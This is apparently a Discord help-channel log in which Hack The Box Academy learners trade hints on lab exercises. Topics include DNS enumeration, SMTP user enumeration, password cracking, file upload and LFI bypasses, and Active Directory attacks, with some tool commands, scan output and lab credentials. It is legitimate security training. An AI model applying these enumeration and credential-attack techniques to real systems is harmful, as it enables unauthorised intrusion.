any alternative's to windows

#

or blind

thorn urchin
#

<@&861185840277487616> can we get rid of this person. Just talks off topic and insults people

zinc marsh
#

all depends what u wanna do lol

tight wadi
#

There's fifty million Linux flavors and then there's Apple, and they all do different things well

zinc marsh
#

is there anyway to take screenshots in the vm to paste them in obsidian?

acoustic owl
zinc marsh
#

the screenshots are saved in the vm

#

i want to paste them in obsidian

#

i got it

wispy aspen
#

I'm a big fan of Greenshot btw for that

tidal mango
slender steppe
#

any hint for the FILE UPLOAD ATTACKS Blacklist Filters
i am able to upload file but not getting code execute
try with hello word

weak charm
#

Make sure to use magic bytes of you haven't. The png bytes look funky also

lean sonnet
#

...

slender steppe
#

yes i have done that

#

php6 & pHp is getting upload

#

not not able to code execute

#

yes

#

Apache/

#

Content-Type:?

rustic sage
#

Can someone help me? Identify if its possible to perform a zone transfer and submit the TXT record as the answer ,But tried all of them as the answer, and with the format it specifies, but it doesn't work. Any ideas?

fathom pendant
#

First do a zone transfer

#

After that one of those zones you can transfer to has a txt record to grab

modern falcon
#

You need to specify the dns server using @<the ip given by htb>

fathom pendant
#

That too

rustic sage
fathom pendant
#

Yes

#

The @ip part is important. It tells dig that the IP is the nameserver to use

rustic sage
#

Where can we go to see the public fingerprint of HTB?

#

fingerprints*

thorn shale
#

I earned the badge for completing Password Attack module
best good morning ever xD

#

25% of path penetration tester passed
thats a not easy way o_o

fathom pendant
rustic sage
#

@Mar

#

@fathom pendant Well, I am working on Getting Started module... And I'm trying to connect with SSH.

fathom pendant
#

The fingerprints are randomly generated by their nature there's not really a full set of public ones

#

Fingerprinting is just for that target in particular

rustic sage
#

So how can one verify that we are indeed connecting to the desired host?

fathom pendant
#

If you use the provided credentials, and they work. You're on the desired host

#

It's really not a hard concept

rustic sage
#

In this case perhaps

#

as a general standard it seems a bit strange

fathom pendant
#

In every case

rustic sage
#

why even have a fingerprint if there is no way to verify?

fathom pendant
#

Fingerprinting is just a measure for revisiting a static IP

rustic sage
#

...

fathom pendant
#

The IPs (for the most part) are randomly generated in the 10.x.x.x range excluding the 10.10.x.x range

rustic sage
#

If not authenticating with the host, there could be a possibility of MITM attack, yes?

fathom pendant
#

You won't get the same fingerprint if you reset the target and ssh into the new IP

#

HTB machines are fairly isolated (hence the need for VPN if not using pwnbox)

#

The 10.x.x.x format is private IP. Whenever a public IP is used it will always be on a docker container

rustic sage
#

Uhm, then I dont understand the need for a fingerprint, if it is equal to the IP (which is already known)

fathom pendant
#

It is not equal to an IP

rustic sage
#

but the fingerprint corresponds to an IP

#

?

rustic sage
#

True, but on should always use good practices in cybsec

#

Eliminate all possible attack vectors

fathom pendant
#

When you click "spawn target" it spawns a virtual machine that is only accessible internally, it is preconfigured with the lab vulnerabilities.

#

You're literally focusing on a nothing

#

If you truly want to eliminate MITM potentiality just do it all from the in-browser pwnbox

#

¯_(ツ)_/¯

#

As all of that is within htb infra

zinc sentinel
fathom pendant
#

The only way for MITM to effect you is if someone was attacking you specifically

rustic sage
#

In this case perhaps, when connecting to an ssh in other cases that might not be a valid way

fathom pendant
#

In any case with HTB modules

rustic sage
#

I'm trying to adopt best standard practices, sorry for being stubborn, still a n00b

fathom pendant
#

While you aren't wrong for external purposes and static networks. Academy is a fluid and dynamic network

#

You're never going to get the same fingerprint twice

#

Because, as stated, the boxes are spawned on a per-need basis

#

And are super isolated to the point where odds are super slim that someone else is touching the same lab as you

rustic sage
#

So a fingerprint is an unique "code" that corresponds to the hosted box, and in HTB's case they change since a box is hosted on a per-need basis?

fathom pendant
#

Yep. Literally the reason it can take a minute for you to get an IP is literally because the VM is launching the box

#

And doesn't have one to give you

#

It's also why you can't leave your own trails on labs if you intend to revisit them

#

Because all it takes is one person to leave a wide open backdoor to completely negate the point of the lab if they were just constantly open boxes

oak kindle
#

can you help me with this one:User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them. can you show me the filter for retrieving the txt in those files

rustic sage
#

Hmmm, so let's say that I host a server where users can connect to my host via ssh. I should then publicly share the fingerprint, i.e on a webpage https://www.supersite.org/publicfingerprint.html for users to verify the fingerprint with the one the users see in their terminal??

fathom pendant
fathom pendant
#

But that's outside of anything the modules cover

wise bramble
#

Hi there, I'm on the Active Directory Enumeration & Attack module, LLMNR Poisoning from Linux. I'm cracking wley ntlm hash but I'm not able to get it. Can someone help me?

craggy hound
#

Anyone did the Intro to Threat Hunting and Hunting with Elastic module?

tribal plinth
#

wrong channel

supple epoch
autumn pilot
#

you will have to verify, check out #welcome

rustic sage
split ruin
#

i'm on last question about DNS, cannot get hostname with x.x.x.203. I tried to enumerate with both dnsenum and dig loop, tried seclists's dictionaries and cannot get the right answer. Most of all, brute-forcing and using dig on a single hostname IP address of which is already known does not show IP address ( A record )

steady plume
#

Hey guys! I'm kind of new to all this and I have started with the HTTP Fundamentals. I've gone through some exercises already and read some articles, but I got stuck. I am stuck at HTTP Methods, more specifically on the GET method exercise. I have trouble finding the 'flag' and obtaining it. I've searched the search.php file, but there was only my search result within it. Can someone guide me on that one? 😮 Thanks in advance!

fathom pendant
split ruin
fathom pendant
#

Your command will contain a.inlanefreight.htb

#

Where a is the subdomain

split ruin
#

THe most interesting part, when i try to dig A record hostnames i already know, it does not give me IP address

fathom pendant
#

And your command is wrong :) i* isn't the correct subdomain

steady matrix
#

Hi everyone, AD Enumeration & Attacks - Skills Assessment Part II, "Crack this user's password hash and submit the cleartext password as your answer" I got the hash and cracked the password. Could someone DM me to clarify something please? Thanks

sick mural
#

HI all, Password attacks section, and skill assessment lab easy. I am trying to crack root pass for last 2 days. Tried following

  1. Provide Password list in PW-attack
  2. used mutated password list leng 8,9,10,11
#

no luck

#

can someone give hint on which password list to go alnog

fathom pendant
#

Why are you limiting the password length?

sick mural
#

there are 91k entries so i grouped them up into multiple files with each file having fixed length password.

fathom pendant
#

Ah so needlessly extending the time you take

sick mural
#

yes

#

it gets you easy on password attempts like you may know most probable password lenght could be 8,9 or 10

#

Any advice on which list to use for cracking.

fathom pendant
#

Give me a few minutes to go check but it should be on mut_passwords

sick mural
#

can you give me wc -l of your mut_passwords?

fathom pendant
#

94044

sick mural
#

good enough

#

same as mine

#

will try this again.

#

do i have to find any other user or shall i use root as the only known account?

solar zodiac
#

wow I love what you guys did with the bloodhound module. Thanks for the playground 🙂

#

my prayers were answered 😄

split ruin
fathom pendant
sick mural
#

Thanks. I am trying it again.

fathom pendant
#

My notes for this module were sparse. This user was near the top of their class in history

pure kiln
#

Hi guys. I did some searching through this room back to October of 2022 to try and find an answer to my question and unfortunately I was unable to.

Could I request a nudge in the right direction for the Basic Bypasses page in the File Inclusion module in the Academy? I am stuck on the "The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt" question.

#

I've tried 15 different payloads and all of them have resulted in failure. I wrote them down as well so someone could tell me if I'm close or just not even in the right ballpark

heady tusk
#

sure, dm me if you want

pure kiln
#

Thank you

wraith delta
#

Hey guys, I currently have a shell on a target machine which i exploiter with elfinder i identified a sudo version 1.8.31 and found relevant exploit but i dont know how to save the shell as sessions

rustic sage
#
└─# smtp-user-enum -M VRFY -U footprinting-wordlist.txt -t 10.129.211.135
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... footprinting-wordlist.txt
Target count ............. 1
Username count ........... 101
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Thu May 25 09:40:21 2023 #########





######## Scan completed at Thu May 25 09:42:06 2023 #########
0 results.

101 queries in 105 seconds (1.0 queries / sec
```   have to use another wordlists ?
#

also i have used nmap script and metsploit still doesnt work

fathom pendant
#

SMTP is notoriously slow might have to __W__ait at least 25 seconds between attempts

fathom pendant
rustic sage
# fathom pendant SMTP is notoriously slow might have to __W__ait at least 25 seconds between atte...
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... footprinting-wordlist.txt
Target count ............. 1
Username count ........... 101
Target TCP port .......... 25
Query timeout ............ 25 secs
Target domain ............

######## Scan started at Thu May 25 10:07:11 2023 ######### 
``` it should work now
#

set the timeout to 25 secs

fathom pendant
#

Ye

rustic sage
fathom pendant
#

Wooo

hexed python
#

Yo I have this problem in file inclusion modules

#
  • 1 Submit the contents of the flag.txt file located in the /usr/share/flags directory.
#

I already have the flag and when I submit, it still failed.

#

anybody have a problem with this ?

#

Ok

#

nvm

#

got it

long grove
#

ATTACKING COMMON SERVICES (Attacking Email Services)

$ python o365spray.py --validate --domain inlanefreight.htb

#

*** O365 Spray ***

----------------------------------------<
version : 3.0.2
domain : inlanefreight.htb
validate : True
validate_module: getuserrealm
timeout : 25 seconds
start : 2023-05-25 15:38:44

#

----------------------------------------<
[2023-05-25 15:38:44,369] info | Validating: inlanefreight.htb
[2023-05-25 15:38:44,788] info | [FAILED] The following domain does not appear to be using O365: inlanefreight.htb

#

Reasons why o365spray tools don't work??

limber widget
dull vortex
#

currently working through Pass the Ticket in Windows - Password Attacks module. As I am trying to do mimikatz powershell remoting with pass the ticket, I am getting this error:

#

Not sure what is going wrong here.

long grove
limber widget
dull vortex
dapper star
#

Got root on Password attack Lab - Easy but not sure if this was the intended way. Anyone want to dm and see if they have the same way? I can show proof.

fathom pendant
dapper star
#

Thanks

fathom pendant
#

Afaik that's the ONLY way to get the root PW unless there's some craaaazy exploit

dapper star
#

Didn't expect that to be the intended way tbh

#

good for me that it was the first thing I had a look at haha ¯_(ツ)_/¯

fathom pendant
#

Nah it's very much intended :) and honestly should be one of the first things you do

#

Lol you'd be surprised how many people bash their heads against the wall on it

#

But also when grabbing the creds like that always do
su root and enter the pw

#

To double verify

#

:)

dapper star
#

I made good progress. Never looked at it before the CPTS path 🙂

fathom pendant
#

Also always take notes! Lol

dapper star
#

No worries 😉

fathom pendant
# dapper star No worries 😉

The medium and hard labs definitely dive harder into the password cracking and jumping back and forth. Definitely rewarding to complete those

dapper star
#

At it now. Will be happy if this module is over... Took waaaaay too much time

fathom pendant
#

Most of the way too much is time consuming cracks xD and waiting for some of the brutes

dapper star
#

Struggled a lot with some questions aswel

vagrant gust
#

@fathom pendant can I dm u a question I have

fathom pendant
#

✨ No ✨ I do not accept DMs unless the question has been asked here and I'm already actively engaged in assisting you

vagrant gust
#

Can anyone show me an example of notes they've made for a module

#

I haven't been making any notes and I wouldn't mind an example

fathom pendant
#

My notes are actually separated: the practical notes, the lab, and the skill assessment(s)

vagrant gust
#

Would it just be whatever commands you've tried

#

And output

#

Or is it more than that

fathom pendant
#

So the practical notes are from the section I'm doing

#

Boiling out the fluff words

#

The lab itself, since I use obsidian is on their canvas feature

vagrant gust
#

Appreciate the breakdown

#

I'll have a look into obsidian

fathom pendant
#

Green is the info text/starting yellow is a direct answer, orange is the mid/potentially high vulnerable user/service I'm currently exploiting

#

I zoomed out so it didn't reveal spoilers

vagrant gust
#

Ur a real one icl

#

Been a massive help for me

#

Thanks mate

fathom pendant
#

With obsidian you can also do back links to your notes

#

For example I can link to my SMTP notes, and specifically the header titled 'ports' in this example

rustic sage
#

How can i start in cybersecurity guys ? i'm new

fathom pendant
lethal atlas
fathom pendant
#

It is

#

¯_(ツ)_/¯

heady geyser
#

need a nudge for password attack medium lab. i've gotten to the point where i have ssh'ed into the machine as jn. i see the user d*s on there as well. i checked to see if the box is part of an AD environment by using the ps -ef | grep -i "winbind|sssd" command. With that command i confirmed that it is indeed part of AD. i went through all the "pass the ticket linux" commands and tools with no luck. Decided i would go through all the "credential hunting in linux" commands. No luck. Ran "firefox decrypt" and "lazagne" with no luck either. Looked through interesting config files and nothing. Not sure where to go. Thanks for any help.

fathom pendant
heady geyser
#

i'll give it a try here in a few min. i guess my question is. If i am logged in as jason without dennis creds, i can see dennis's history?

#

when i logged in as jason, 'history' was the first command i ran but i remember nothing being there

#

i'll double check here in a few minutes, thanks though

fathom pendant
#

Do you have D* creds?

#

If not then J*can also be useful to find an internal service :)

heady geyser
#

i dont have dennis creds. cool, i think thats the nudge. thanks

fathom pendant
#

There's also documentation that may be more helpful in reference to J* creds

fathom pendant
pine dagger
fathom pendant
#

That's a personal problem then

#

i don't have a need for syncing so it hadn't been an issue ¯_(ツ)_/¯

pine dagger
#

Yeah, but you might as well use vscode

fathom pendant
#

markdown and better looking visually

proud pine
#

*vscodium

pine dagger
#

You can do markdown in vscode

fathom pendant
#

we have our preferences ¯_(ツ)_/¯

pine dagger
#

Yep. People will use what they are happy with... even emacs (ugh).

heady geyser
#

just a general question. if you ssh into a specific machine and run linpeas. if you then ssh into that SAME machine but with someone else's creds, does it make sense to run linpeas again?

fathom pendant
#

Generally yes. But linpeas should be run as root user/sudo

#

But also linpeas can lead you down unrelated rabbit holes

heady geyser
#

thank you

weak charm
thorn urchin
#

if youre actively exploiting it then linpeas as root is a little too late lol

fathom pendant
#

Lol yeah

#

But I tend to use linpeas as last resort. Because it's led me down rabbit holes

thorn urchin
#

Yeah it can also be slow and a firehose of info in a situation where sudo -l gives you the path forward lol

#

so yeah I dont use linpeas either until Ive exhausted manual checks that come to mind

fathom pendant
#

Then linpeas is like "hey that thing you just did manually? Yeah that was vulnerable, lul"

limber widget
#

On "Attacking Common Services - Medium" - am I on the right track with app.inlanefreight.htb? Cant seem to find anything else useful but this isnt leading me anywhere either

fathom pendant
#

Iirc yes. You just need to have it in your /etc/hosts

glass hill
#

hey
just signed up and did the tutorial and stuff
my question is that as i calculated rq i cant really do anything except the basic courses (which cost 10 and reward 10, so tier 0) without actually paying
so is this right or no
that i have to invest in some to actually get a course which is full of content and stuff

#

and whats there i can do basically to get some actual knowledge but for free

lethal atlas
#

Utilize the basics to determine if you want to continue to pursue this field. If you choose to continue, then the few dollars a month or even a one time investment is worth the knowledge.

#

Considering the price of any valid certification, academy is dirt cheap.

rustic sage
#

Quick question, what is the ls command to search for the last edited file in a directory

fathom pendant
#

Ls, list stuff

rustic sage
#

?

#

just ls the directory?

fathom pendant
#

ls by default lists the current directory

polar widget
#

ls -altr

#

Try that

fathom pendant
#

You can provide it a filepath

#

man ls

polar widget
#

ls -altr /path/to/file/directory

rustic sage
#

Thank you @polar widget

slim goblet
#

hey guys if anyone is free and willing to help and has done cubemadness 2, please DM me, I'd really appreciate it 🙂

fathom pendant
slim goblet
#

(y)

thorn urchin
#

Read and you wont have to ask y

autumn pilot
#

Use what is mentioned in the hint and scramble it

#

using the methods taught in a previous section

#

Scramble = mutate it

zinc marsh
#

is there any way to resize the xfreerdp?

autumn pilot
#

yes

#

use the /dynamic-resolution parameter

zinc marsh
#

inside the xfreerdp?

fathom pendant
#

"who in most cases"

fathom pendant
#

xfreeerdp /v:IP /u:user /p:pass /dynamic-resolution

zinc marsh
#

i resize it

#

and the part i resize stays black

autumn pilot
#

if the machine's max resolution is smaller than yours it will stay like that

fathom pendant
#

This doesn't seem related to an academy module, please read #rules and #welcome

opaque leaf
#

okay sorry where should i post my question ?

fathom pendant
#

If you read the channels I linked, you may find a more suitable channel

opaque leaf
#

okay thank you ❤️

fathom pendant
#

But no guarantees of answers

opaque leaf
#

so sad

#

i won't post

fathom pendant
#

I mean you don't get answers if you don't ask

opaque leaf
#

ahh i thought i can't have answer

fathom pendant
#

i just can't say there's a guarantee that someone in the server knows what you're trying to accomplish ¯_(ツ)_/¯

opaque leaf
#

okay let me post it and see if anyone can help me

#

it is easy for someone manipulated wazuh before

#

just simple rules

fathom pendant
#

¯_(ツ)_/¯

#

Again I've pointed you to the right place to ask. So ask there

#

Or at least, a right place to ask

opaque leaf
#

i did thank you

#

let's wait now and see

ashen umbra
#

Im in DNS enumeration and I cannot for the life of me find the xxx.xx.xx.203 FQDN. I tried dnsenum on inlanefreight.htb and internal.inlanefreight.htb. anyone got any hints on this one

fathom pendant
#

The point of brute forcing is if it's not willingly giving you info

ashen umbra
#

i have app. ns. internal. and a few others. I think I missed something in zone enumeration

fathom pendant
#

You also need the right wordlist

#

Something a bit ferocious, so to speak

ashen umbra
#

ahhhh

fathom pendant
#

Your answer will look like a.b.inlanefreight.htb

#

so it's not a long dive

ashen umbra
#

awesome thanks. I have been on this one for a long time. DNS and my brain just don't mesh sometimes

fathom pendant
#

No problem. Focusing on the wrong thing certainly happens

ashen umbra
#

dnsenum --dnsserver XX.XX.XX.XXX --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/fXXXXXXXX.txt inlanefreight.htb

used that and recieved only two subdomains that I already have. app and ns.

past garden
#

I'm in Hacking WordPress Skill Assessment. Question: Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
I'm a little confused as I found the flag on a website without downloading any file. Is that how it is intended?

acoustic owl
fathom pendant
#

You can almost always ignore ns.x.x for domains

acoustic owl
fathom pendant
#

I just meant for brute forcing

#

Usually there's not anything below that

#

However not always

acoustic owl
#

Zone is not equal to domain 🙂

#

A DNS zone is a part of the DNS namespace managed by an organization or person. It is an administrative entity.
At least one authoritative name server is responsible for each zone.

short mirage
#

I don't think I am doing something wrong, but when I attempt to RDP in AD module, I encounter an error that says certificate validation error.
Please dm me for the picture because I can't send it and the bot won't let me type it. Is it a me issue?

acoustic owl
fathom pendant
#

Cert Validation errors are fairly expected

#

There's probably a more direct failure that's causing it not to connect

#

Most likely NT_STATUS_LOGON_ERROR

short mirage
#

Yes it does include that in the error

fathom pendant
#

Then that means something about your logon is incorrect

#

Nothing about certification

short mirage
#

I'm not sure why though, I used xfreerdp /u:htb-student /p:'Academy_student_AD!' /v:10.129.138.111 and I was told to use
RDP to 10.129.138.111 with user "htb-student" and password "Academy_student_AD!"

fathom pendant
#

Try double quotes instead

short mirage
#

The little space after the exclaimation mark isnt a mistake, it is from the backtick

#

I get a dquote> error then

fathom pendant
#

Dquote error?

short mirage
#

Yeah

fathom pendant
#

I'm asking you to elaborate

#

Also try putting /v: first

short mirage
#

/v: first didn't change anything either

misty current
#

dquote isn't an error. It means you've got some quotes not closed properly

static roost
#

Module: Documentation & Reporting
Section: How to Write Up a Finding
Sub-Section: Hands-On Practice

Question about writehat usage. I'm trying to create a finding and place it on a "Findings" report template. I successfully created the finding, but can't figure out how to reflect it on the actual report. Anyone mess with this?

fathom pendant
#

Are you doing two single quotes or a double quote

short mirage
#

With double quotes the exclaimation mark in the password turns blue

#

an actual double quote

#

xfreerdp /v:10.129.138.111 /u:htb-student /p:"Academy_student_AD!"

fathom pendant
#

Try wrapping htb-student in single quotes as well

tidal mango
#

Or try Remmina

misty current
#

If the exclamation mark is turning blue then, can you try this?
xfreerdp /v:10.129.138.111 /u:htb-student /p:"Academy_student_AD\!"

short mirage
#

I get a broken pipe error now

fathom pendant
#

I feel like there's something obvious

#

Single quotes should work

#

Which module is it?

short mirage
#

I tried on the pwnbox too, broken pipe error.

#

ACTIVE DIRECTORY ENUMERATION & ATTACKS, Credentialed Enumeration - from Windows

fathom pendant
#

Give me a moment

tidal mango
#

Yeah single quotes should work fine..

fathom pendant
#

I don't recall having any issues with this module

misty current
#

Yeah, it works fine for me too with the same command.

fathom pendant
#

I had to wait a minute for the rdp service to fully activate

#

But it worked fine for me

misty current
#

@short mirage maybe try restarting the target and give it like 5 minutes before connecting to rdp.

misty current
#

5 minutes after the target IP shows*

fathom pendant
#

Yep but single quotes works fine

limber widget
#

Common Services - Hard Lab. Is this HTB issue or my issue? This worked before, now even after box resets, I cant get back in. ```
PS C:\Users\Fiona> sqlcmd -S SRVMSSQL -U fiona -P 'pw' -y 30 -Y 30
Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [53]. .
Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.
Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online..

fathom pendant
#

Also spoilers for password

limber widget
#

same error, that command is saved in my notes as if it were working earlier, took a break and reset the box and cant get back in. Strange

fathom pendant
#

Interesting

limber widget
#

cant even run nmap on it now, gonna reset again. Very odd

fathom pendant
#

Yeah sounds like it needs a reset

#

Which happens

limber widget
#

its gotta be my command sqlcmd -S SRVMSSQL -U fiona -P '||48Ns72!bns74@S84NNNSl||' -y 30 -Y 30

fathom pendant
#

im taking a break from HTB for the day but hopefully it's able to be resolved ¯_(ツ)_/¯

limber widget
#

the box died again, is anyone else having issues?

fathom pendant
#

Try changing VPN regions and regenning the VPN key

#

Also: if you have pwnbox running turn it off

limber widget
#

I never use pwnbox

#

this just seems like a htb issue

fathom pendant
#

Like I said , change VPN region download new config file and try again ?

#

If not engage support on the site

limber widget
#

anyone else having similar issues?

waxen kayak
#

AD Enumeration & Attacks - Skills Assessment Part II <<<< this assessment was pretty rough. took me a while but wonder if it was because I took a few weeks break. It has me kinda concerned for the exam though.

zinc marsh
#

why it doesnt show the NTLM hash?

acoustic owl
solar zodiac
#

has anyone done the documenting module?

#

I was kinda curious if it taught how to generate pdf reports that look nice

#

obsidian exports dont look very nice

#

and bumping around in office is kinda a pain with screenshots

#

was hoping there would be a pandoc guide

#

or something similar 🙂

zinc marsh
honest ridge
#

when using nopac.py it connects with a semi interactive shell, cant cd and and move around. full path only? but how?

zinc marsh
#

search for full tty

thorn urchin
#

thats be impressive with nopac

#

nopac is windows vuln

zinc marsh
#

ah lol

thorn urchin
#

I mean you could get lucky and have python installed, but /bin/bash not so much lol

zinc marsh
#

i just read interactive shell lol

#

@thorn urchin that one?

honest ridge
#

yeah, nopac is using against windows. but not sure how to move around now

thorn urchin
honest ridge
#

any ideas/tips/hints. It says will need to use exact paths but i dunno not seem to work

steady matrix
#

Hi everyone, AD Enumeration & Attacks - Skills Assessment Part II, "Crack this user's password hash and submit the cleartext password as your answer" I got the hash and cracked the password. Could someone DM me to clarify something please? Thanks

zinc marsh
#

someone could help me with domenting and reporting module

#

am stuck getting the NTLM hash in the lab